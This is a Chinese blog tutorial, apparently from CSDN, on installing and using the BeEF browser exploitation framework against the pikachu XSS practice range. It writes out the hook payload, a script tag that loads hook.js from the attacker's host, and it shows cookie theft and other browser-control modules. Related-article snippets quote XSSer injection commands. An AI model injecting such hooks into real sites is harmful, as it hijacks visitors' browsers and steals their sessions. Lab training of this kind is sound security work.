xss-工具-Beef-Xss安装以及使用

最新推荐文章于 2024-05-03 11:00:47 发布
最新推荐文章于 2024-05-03 11:00:47 发布
阅读量5.8k 收藏 60
点赞数 8
分类专栏: # XSS跨站脚本 文章标签: xss beef beef-xss xss工具 beef安装
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44257023/article/details/125944534
版权

Beef-Xss工具的简介

KaliLinux官网对这工具的介绍地址:https://www.kali.org/tools/beef-xss/
GitHub地址:https://github.com/beefproject/beef
Beef-Xss工具Wiki:https://github.com/beefproject/beef/wiki
在这里插入图片描述
BeEF 是浏览器开发框架的缩写,它是一款专注于网络浏览器的渗透测试工具
随着人们越来越担心针对客户端(包括移动客户端)的网络攻击,BeEF 允许专业的渗透测试人员通过使用客户端攻击向量来评估目标环境的实际安全状况,与其他安全框架不同,BeEF 超越了加固的网络边界和客户端系统,并在一扇敞开的门的上下文中检查可利用性:Web 浏览器
BeEF 将挂钩一个或多个 Web 浏览器,并将它们用作启动定向命令模块的滩头阵地,并从浏览器上下文中进一步攻击系统

安装Beef-Xss工具

这个工具最新的KaliLinux版本这个工具默认是不安装的,之前老版本的是自带的不管这么

apt-get install beef-xss


sudo apt-get install beef-xss

一路 y 就好,然后等待
如果出现下图,解决方法换地址源或者 apt update 重启之后在执行安装命令
在这里插入图片描述

启动Beef-Xss工具

beef-xss

第一次启动可能会提示这个,让你输入一个新的密码,输入回车即可(不会显示你输入的密码)下一次就不会让你输入了
在这里插入图片描述
它会自动打开浏览器 beef 控制台(账号默认:beef 密码(你第一次进入beef输入的))
在这里插入图片描述

关闭Beef-Xss

beef-xss-stop

在这里插入图片描述

Beef-Xss登录账户密码忘记解决方案:

安装之后在 /usr/share/beef-xss 目录下有一个 config.yaml 文件里面记录了密码账号:
在这里插入图片描述
用 vim 或者其它方式打开config.yaml 文件中 credentials: 下的 user是账号、passwd是密码,直接修改保存即可
在这里插入图片描述

启动Beef-Xss之后控制台会有一下信息

在这里插入图片描述

beef的xss代码格式:

<script src="http://<IP>:3000/hook.js"></script>

例子:比如我的KaliLinux的ip地址:192.168.56.129

<script src="http://192.168.56.129:3000/hook.js"></script>

beef控制台地址

http://127.0.0.1:3000/ui/panel
或者我的KaliLinux的ip地址:192.168.56.129 在宿主机浏览器输入:http://192.168.56.129:3000/ui/panel 都可以

Beef-Xss使用

在这里插入图片描述
我用pikachu靶场xss的存储型演示:
在这里插入图片描述
上面已经看到成功了,有时不一定怎么快展示等一会刷新一下
在这里插入图片描述
获取这些之后,具体可以实现上面功能在 commands 中查看
在这里插入图片描述
在这里插入图片描述

commands 模块中大概都是什么意思

我这里用就直接用谷歌翻译了
在这里插入图片描述
点击任意一个都有说明的比如播放声音模块
在这里插入图片描述

Browser(浏览器模块)

在这里插入图片描述
在这里插入图片描述

Chrome Extensions (Chrome 扩展)

在这里插入图片描述

Debug (调试)

在这里插入图片描述

Exploits(漏洞利用)

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

Host(主持人)

在这里插入图片描述

IPEC(国际环保提倡)

利用通信 (IPEC)进行的操作
在这里插入图片描述

Metasploit

在这里插入图片描述

Misc(杂项)

在这里插入图片描述

在这里插入图片描述

Network(网络)

在这里插入图片描述
在这里插入图片描述

Persistence(坚持)

在这里插入图片描述

Phonegap(电话间隙)

在这里插入图片描述

Social Engineering(社会工程)

在这里插入图片描述

简单的使用一个播放声音

是有一个 biu的一个声音
在这里插入图片描述

检测是否有 VLC

在这里插入图片描述

获取cookie

在这里插入图片描述

还有很多功能的这里就不一一演示了

常家壮
关注
  • 8
    点赞
  • 60
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XSS漏洞检测工具
06-11
XSS漏洞检测工具,Linux下安装使用,很简单 Examples of usage: ============================== * Simple injection from URL: $ python XSSer.py -u "http://host.com" ------------------- * Simple injection from File, with tor proxy and spoofing HTTP Referer headers: $ python XSSer.py -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "666.666.666.666" ------------------- * Multiple injections from URL, with automatic payloading, using tor proxy, injecting on payloads character encoding in "Hexadecimal", with verbose output and saving results to file (XSSlist.dat): $ python XSSer.py -u "http://host.com" --proxy "http://127.0.0.1:8118" --auto --Hex --verbose -w ------------------- * Multiple injections from URL, with automatic payloading, using caracter encoding mutations (first, change payload to hexadecimal; second, change to StringFromCharCode the first encoding; third, reencode to Hexadecimal the second encoding), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads): $ python XSSer.py -u "http://host.com" --auto --Cem "Hex,Str,Hex" --user-agent "XSSer!!" --timeout "20" --threads "5"
利用BeEF执行XSS攻击
m0_70185580的博客
05-31 392
XSS攻击(Cross-Site Scripting)是指攻击者在网页中注入恶意脚本代码,使受害者在浏览器中运行该脚本,从而达到攻击目的。BeEF是一种利用浏览器漏洞的攻击工具,可以在浏览器端运行恶意脚本。当攻击成功后,可以在BeEF的控制面板中查看受害者的浏览器信息,并控制其浏览器。这段代码会将BeEF的hook.js文件注入到目标网站中,并启动BeEF的hook服务。接下来,需要获取要攻击的网站的URL。当受害者在浏览器中打开包含恶意脚本的页面时,BeEF就会启动并开始执行攻击。
XSS漏洞自动化攻击工具XSSer
weixin_34018169的博客
08-30 959
2019独角兽企业重金招聘Python工程师标准>>> ...
XSS漏洞及其工具Beef使用
ytdd66的博客
03-22 730
XSS(Cross Site Scripting,跨站脚本漏洞)漏洞,又叫 CSS 漏洞,是最常见的 Web 应用程序漏洞。其主要原理是当动态页面中插入的内容含有特殊字符(如
跨站脚本漏洞
weixin_46729085的博客
09-08 3721
XSS漏洞 一、文章简介 XSS漏洞是Web应用程序中最常见的漏洞之一。如果您的站点没有预防XSS漏洞的固定方法,那么很可能就存在XSS漏洞。 这篇文章将带你通过代码层面去理解三个问题: 什么是XSS漏洞? XSS漏洞有哪些分类? 如何防范XSS漏洞? 二:三大分类 反射型XSS:<非持久化> 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。 存储型XSS:&...
这个工具可以帮你自动化XSS漏洞的发现和利用:XSS-Exploitation-Tool:一个强大的XSS漏洞扫描与利用工具
jklbnm12的博客
07-22 2298
功能说明获取关于目标浏览器的技术数据可以获取目标浏览器的类型、版本、操作系统、语言等信息获取目标用户的地理坐标位置可以获取目标用户的经纬度、国家、城市等信息获取已挂起/已访问的网页快照可以获取目标用户访问过或者正在访问的网页的截图获取已挂起/已访问的网页源代码可以获取目标用户访问过或者正在访问的网页的源代码提取表单输入字段数据可以获取目标用户在表单中输入过或者正在输入的数据获取Cookie数据可以获取目标用户在浏览器中存储的Cookie数据键盘记录功能。
XSS跨站脚本攻击
weixin_68057794的博客
08-08 816
XSS全称(Cross Site Scripting)跨站脚本攻击,是最常见的Web应用程序安全漏洞之一,位于OWASP top 10 2013/2017年度分别为第三名和第七名,XSS是指攻击者在网页中嵌入客户端脚本,通常是JavaScript编写的危险代码,当用户使用浏览器浏览网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的。从上面中的一段话,可以得知,XSS属于客户端攻击,受害者最终是用户,但特别要注意的是网站管理人员也属于用户之一。...
Beef-xss
dieman0446的博客
12-19 186
Beef xss beef安装目录:/usr/share/beef-xss UI URL:http://IP:3000/ui/panel Hook:<script src="http://IP:3000/hook.js"></script> 默认测试页面:http://IP:3000/demos/butcher/index.html 转载于:h...
xss工具
cnbird's blog
03-24 1107
http://huaidan.org/archives/769.htmlhttp://www.anqn.com/article/b/kuazhan/2008-04-10/a0994591.shtmlhttp://xss-proxy.sourceforge.net/Advanced_XSS_Control.txt
beef-xss安装使用
Bu2n的博客
12-07 3235
文章目录kali安装与更新软件源beef-xss安装快速上手beef-xss kali安装与更新软件源 传送门 beef-xss安装 sudo apt-get install beef-xss sudo beef-xss 第一次启动beef要修改密码,要仔细看清楚 快速上手beef-xss http://127.0.0.1:3000/ui/panel beef的管理面板 输入自己的账号密码默认beef beef 这样就能进入到管理页面 查看kali的ip地址 构造下面js代码,想办法给其他人
BeEF-XSS详细使用教程
一个懒鬼的博客
05-10 6353
BeEF-XSS简介 BeEF-XSS是一款非常强大的web框架攻击平台,集成了许多payload,可以实现许多功能! 启动BeFF-XSS 关于kali没有安装beef可以参考下图: BeEF-XSS管理登录页面 用户名默认为beef,密码在首次启动beef-xss时需要手动设置。(启动beef-xss会自动打开浏览器) BeEF-XSS主页面介绍 Hocked Browers online browers 在线浏览器 offline browers 离线浏览..
xss漏洞扫描工具
03-12
它可以分析使用HTTP和HTTPS协议进行通信的应用程序,可以用最简单地形式记录它观察的会话,并允许操作人员以各种方 式观查会话。如果你需要观察一个基于HTTP(S)应用程序的运行状态,可以满足你这种需要。不管是帮助开发人员调试其它方面 的难题,还是允许安全专业人员识别漏洞,它都是一款不错的工具
XSS漏洞测试工具
02-10
XSS是一种非常常见的漏洞类型,它的影响非常的广泛并且很容易的就能被检测到。 攻击者可以在未经验证的情况下,将不受信任的JavaScript片段插入到你的应用程序中,然后这个JavaScript将被访问目标站点的受害者执行
XSS-Codec XSS代码转换工具
01-14
XSS代码转换工具,用于XSS代码的转换
xss-labs-master.rar
05-09
xss-labs-master靶机资源,有关于xss漏洞攻击专项练习,一共有二十关,也是小白的看门砖吧!
安装xss-labs ppt手册
10-22
安装xss-labs
xss-labs.zip
03-18
xss-labs是一个网站,其中包含了20个含有XSS漏洞的网页,用于学习XSS
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
经典的xss注入通关游戏,搭建简单。适合网络安全测试人员
一个5000刀的XSS
最新发布
2401_84434570的博客
05-03 219
背景介绍今天分享国外一个白帽小哥Crypto通过发现Apple某网站XSS而获得5000美元赏金的故事。废话不多说,让我们开始吧~
web安全之kali-xss-beef剑心哥哥
12-24
Kali Linux是一种用于网络安全测试和渗透测试的操作系统,它具有强大的工具和功能,可以用于检测和解决网站的安全漏洞。XSS(跨站脚本攻击)是一种常见的网络安全漏洞,可以通过在网页中插入恶意脚本来获取用户的敏感信息。 BeEF(浏览器控制框架)是一个用于检测和利用Web浏览器漏洞的工具,可以用于执行XSS攻击,获取用户浏览器的信息和控制用户的浏览器。在Kali Linux中结合使用XSSBeEF可以实现对网站的全面安全检测和攻击。 “剑心哥哥”可能是指对网络安全有一定研究和实践经验的人,因为这些工具都需要一定的技术和知识才能使用。结合使用Kali Linux、XSSBeEF可以帮助“剑心哥哥”对网站进行全面的安全检测,并了解和利用XSS漏洞来展示其危害性。同时,也需要“剑心哥哥”具备一定的伦理和法律意识,不能利用这些工具进行非法攻击和侵犯他人隐私。通过学习和实践网络安全相关知识,我们可以更好地保护自己的网络安全,并为网络安全事业做出贡献。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值